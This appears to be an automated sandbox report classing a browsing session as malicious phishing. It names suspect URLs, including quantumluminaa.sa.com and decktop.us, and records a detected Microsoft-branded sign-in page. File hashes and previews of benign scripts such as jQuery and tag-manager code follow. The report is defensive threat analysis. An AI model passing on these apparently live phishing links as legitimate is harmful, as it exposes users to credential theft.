                                                                                                          Analysis Mode:stream
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal64.phis.win@19/65@134/625
                                                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.16.142, 64.233.184.84, 34.104.35.123
                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • VT rate limit hit for: https://decktop.us/MUYKd1
                                                                                                          InputOutput
                                                                                                          URL: https://quantumluminaa.sa.com/N2AB1/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["CLOUDFLARE"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "prominent_button_name":"unknown",
                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/yg2ds/0x4AAAAAAAh5rQ_2_FjCxZwY/auto/fbE/normal/auto/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["CLOUDFLARE"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "prominent_button_name":"unknown",
                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://quantumluminaa.sa.com/N2AB1/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Microsoft"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "prominent_button_name":"Next",
                                                                                                          "text_input_field_labels":["unknown"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "has_visible_qrcode":false}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 26 13:48:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2673
                                                                                                          Entropy (8bit):3.9856722185017532
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:7651A6B583CA9F824240EA3D7525E3A6
                                                                                                          SHA1:AB5CC600D9713EB15ABA2D7EF7ED68CFA09F798C
                                                                                                          SHA-256:64D13774203282E2B60EB94EC64E2EEA629579BA4EF62214A56F245FB2E8B9B5
                                                                                                          SHA-512:2D0795688EA0FA1B373163F9823E23D5BB24D15B166CF6EB93545801CF6A70CD6F07FA239D4CAEA9CF6708D9A702E04A04C26D9DB7E166D72808F24A649634EC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 26 13:48:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2675
                                                                                                          Entropy (8bit):4.004059786666645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:29C4619EC3ED532F9A9BF12CE7530E25
                                                                                                          SHA1:97E74C7CD298EECA89C4B993001D023E0777953A
                                                                                                          SHA-256:AC2DFA267C85736FF1FB0BE3E2ABBF5977F36E2F7E76DEBE288E1A0866D80921
                                                                                                          SHA-512:8BF77D7F8D5B64E73E9CBA0867CAF21946A5CB9A04342241EB32B882FAD281C41EC67ECF20ED6C7080C919A293944E9A5C7F20F60E1A96364BEFF08FCF1FEBF0
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,....l&......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2689
                                                                                                          Entropy (8bit):4.007498578538452
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BECA0DDCB3F83C5F2635F77D3E23B556
                                                                                                          SHA1:0E661CAAB1DB7C3A5E404B7A1CDE653A43483D99
                                                                                                          SHA-256:05E12C7329A76E941CE240909C651579F96F09F5973E2BAFA1F031854CBF9F29
                                                                                                          SHA-512:8C2CB200D7C93A1CA93BBF416BA48C8133848EAA553378A2ABF81E94DEC2931D878AFACB3F4BD8C0D861E9D0F08AAB711A485D4D6A0EFEBD0765740EEF62EAA5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 26 13:48:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2677
                                                                                                          Entropy (8bit):4.003015118620283
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:32DDA42560CD49540944BD0E25FB9350
                                                                                                          SHA1:C023B310783C060E71283886224974E1AD369EAC
                                                                                                          SHA-256:66450075DA669475CEFE4D8ACE426F8C945FC7312C9C584DFE2B3B14D7534C6F
                                                                                                          SHA-512:04B565985D7DD533BB853F2E290FC9BA1243708FA41A6C707B5F957A4488E618F34128EE7FEDA00E19590E514450E3E48766408BFCEB50C346839BAE6F043BA1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,.....y.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 26 13:48:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2677
                                                                                                          Entropy (8bit):3.9922811384927352
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D87269163A6434F56606800631E61F3B
                                                                                                          SHA1:7B9C9366DB092658B928FC4DCE03080D785CD189
                                                                                                          SHA-256:843A56A6D1B5372E06BDD848834E89D91D2E1649BB5CC514398ED980D1D7E7A8
                                                                                                          SHA-512:C5EF6F6B4CA8460A1A99F01D86C32198B2D5F1A7807E98B529153D2E6825DF2FB2AD66C4262EC27FFF5E3BBC54380DEC8F82426C2C6CD84F531992CD39C521E5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 26 13:48:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2679
                                                                                                          Entropy (8bit):3.9975288919704783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B9BFC999D69A86DF29210C021C32ED82
                                                                                                          SHA1:EA12BF27FADD303FAB98A676765029687DBB8B82
                                                                                                          SHA-256:1C7F37E5192C0DBD3C6F6F4ADD43D955682F030FF7899880548C554090A5466C
                                                                                                          SHA-512:260BC66CF219642178FD8A6ACABEFED0C62229CDB0D3D014B9587DF8E80A494A1C2205ABB3CA6978F3C63BDB9EEAEE8EC13E90CCC2755AAB5855C0AAE0887AC1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,....g.n.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.v....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):89501
                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (34229)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):363964
                                                                                                          Entropy (8bit):5.55438382303113
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A56CF9FCA0487AB525D7A0E5FDE2682C
                                                                                                          SHA1:B8C4BDE6666291597DF7782DCD9978ADC8D6587A
                                                                                                          SHA-256:488EC98D65FF9B7F343960607081416C07D77443F1A879C4F1C958D67E2432D0
                                                                                                          SHA-512:11BFC64E5147732EEBDEDC9FA149E6C311050C7DAB8F90D8719162939B6142DCE25C8FB7B27C1395226731297631995029A03BE1A8721242F2E3B39902A3D1AF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"119",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):67869
                                                                                                          Entropy (8bit):5.4731828252158365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:73DEE0CD32004FFD62C9C96C26D39BD3
                                                                                                          SHA1:8A1FB53D651B87B21486B886660B60AACB6006C3
                                                                                                          SHA-256:270A35CDE989F0FB3E030A54BF0AE7C75D0BFD7FC85434038E00AC0C1C71525F
                                                                                                          SHA-512:000AE3ECECF8AD4685CCF9959E0F935A9446D865389336619D557DF9DFFC931DBA96C0A941E354F19BF2EB97B15DE6E7FAEE33234BA831307418563FC297FD16
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:"https://fonts.googleapis.com/css2?family=Inter:wght@100..900&family=Merriweather:ital,wght@0,300;0,400;0,700;0,900;1,300;1,400;1,700;1,900&family=Nunito:ital,wght@0,200..1000;1,200..1000&family=Open+Sans:ital,wght@0,300..800;1,300..800&family=Playfair+Display:ital,wght@0,400..900;1,400..900&family=Raleway:ital,wght@0,100..900;1,100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2JL7SUc.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa0ZL7SUc.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2ZL7SUc.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. f
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (18563)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18631
                                                                                                          Entropy (8bit):5.202966422955863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:09B14B1BA6786196E15547B3F7F0E943
                                                                                                          SHA1:9C96D18A3AB87D0BAEC8000104CAAB046D0BC6D3
                                                                                                          SHA-256:109C8DD6E64B1CC28C62D6B4C01C9A940BC549E6F240856C0CFB1084DC2B3AD9
                                                                                                          SHA-512:908DD8377A77ADB06BC8930843FB3862BE4AAFF310B5CFAE90AC094B773F816CAE039AD2D2E43AB4479588E0605782A168A327F37ADB6C2427BFBC3775B8FC1D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:/*! Build 6e0986f60cce7fcddee19ad763c3ed719fd0b6c9:1724072238693 */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="https://cdn.getrewardful.com/pa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2
                                                                                                          Entropy (8bit):1.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                          SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                          SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                          SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (2731), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2744
                                                                                                          Entropy (8bit):5.616263704278676
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:13130E38D18B403FEE177E92FE7DBA38
                                                                                                          SHA1:1AB41D44B6C00218F7853DB7A72866B27374E6BF
                                                                                                          SHA-256:4A0DC09BCD106650CEACA25E997BB39530E3081FC0931C1E49DA3915C86C0599
                                                                                                          SHA-512:E19BED6ED44A37989815E7E7FBCBD54ADC72F41E92684BF683ACEA8E991E728DC9E44624F0F80F97724CD23788CA5C1A953C6825A25E48E22C4802260D5368AC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:TFASC.trkCallback({"trc":{"si":"ad39888a7c34c2230b8bcef85b2b821c","sd":"v2_ad39888a7c34c2230b8bcef85b2b821c_a7da0332-0b6d-4015-b438-7bc53882df9f-tuctdc61b4f_1724683727_1724683727_CNawjgYQx5JjGOnRpPmYMiABKAMw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiQgI6I5eeGxhBwAQ","ui":"a7da0332-0b6d-4015-b438-7bc53882df9f-tuctdc61b4f","plc":"DESK","wi":"8865116369869638730","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1624391","cpb":"EhIyMDI0MDgyMi01LVJFTEVBU0UYASCc__________8BKhljaC50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmc4MTI4gPa5QUCRpA5I_NgPUKvL2QNY6gRjCNNXEMdzGDBkYwiNWhC5dhgyZGMI3f__________ARDd__________8BGCNkYwiWFBCeHBgYZGMI0gMQ4AYYCGRjCKocEItfGAlkYwi7ShCkYhgLZGMInmgQn4cBGD1kYwjC__________8BEML__________wEYPmRjCKQnEIo1GC9kYwj0FBCeHRgfZHgBgAHiI4gBy5mQ0gGQARiYAdzopPmYMtsBEAHcAQ","evh":"562746651","evi":{"48":"11219|14791","50":"11533|15161","61":"13342|17311","62":"-62|-62","47":"5028|6794"},"vl":[{"ri":"18c2f7af4cc
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):110114
                                                                                                          Entropy (8bit):5.431791963576958
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8ED5E93FFC3C0CFE70023E4E6F2E108A
                                                                                                          SHA1:F00F18DBBE6515F095C7ADE59170237A3C625623
                                                                                                          SHA-256:542B6AA9EB5E6AAEF2FEC2973C597FF4E6C17CA508671269F3D20660DC403B04
                                                                                                          SHA-512:F2A6721850F9C16284C911AE0AE802B81D37DE22EB83A14ECC7D59DC57357A258E327968239C318F595017E192BD59948E16287A553151E2A7459639F8AD0145
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://us-assets.i.posthog.com/static/recorder.js?v=1.151.0
                                                                                                          Preview:!function(e){"use strict";function t(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function n(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?t(Object(r),!0).forEach((function(t){l(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):t(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function r(){r=function(){return e};var e={},t=Object.prototype,n=t.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},a=o.iterator||"@@iterator",i=o.asyncIterator||"@@asyncIterator",s=o.toStringTag||"@@toStringTag";function u(e,t,n){return Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{u({},"")}catch(e){u=function(e,t,n){return e[t]=n}}function c(e,t,n,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (430), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6848
                                                                                                          Entropy (8bit):4.684194287837596
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BA77F02B7126A3348B374B172D860DF6
                                                                                                          SHA1:D089F9EA60BD0D15E2C04AA6118DB705C13A2FE0
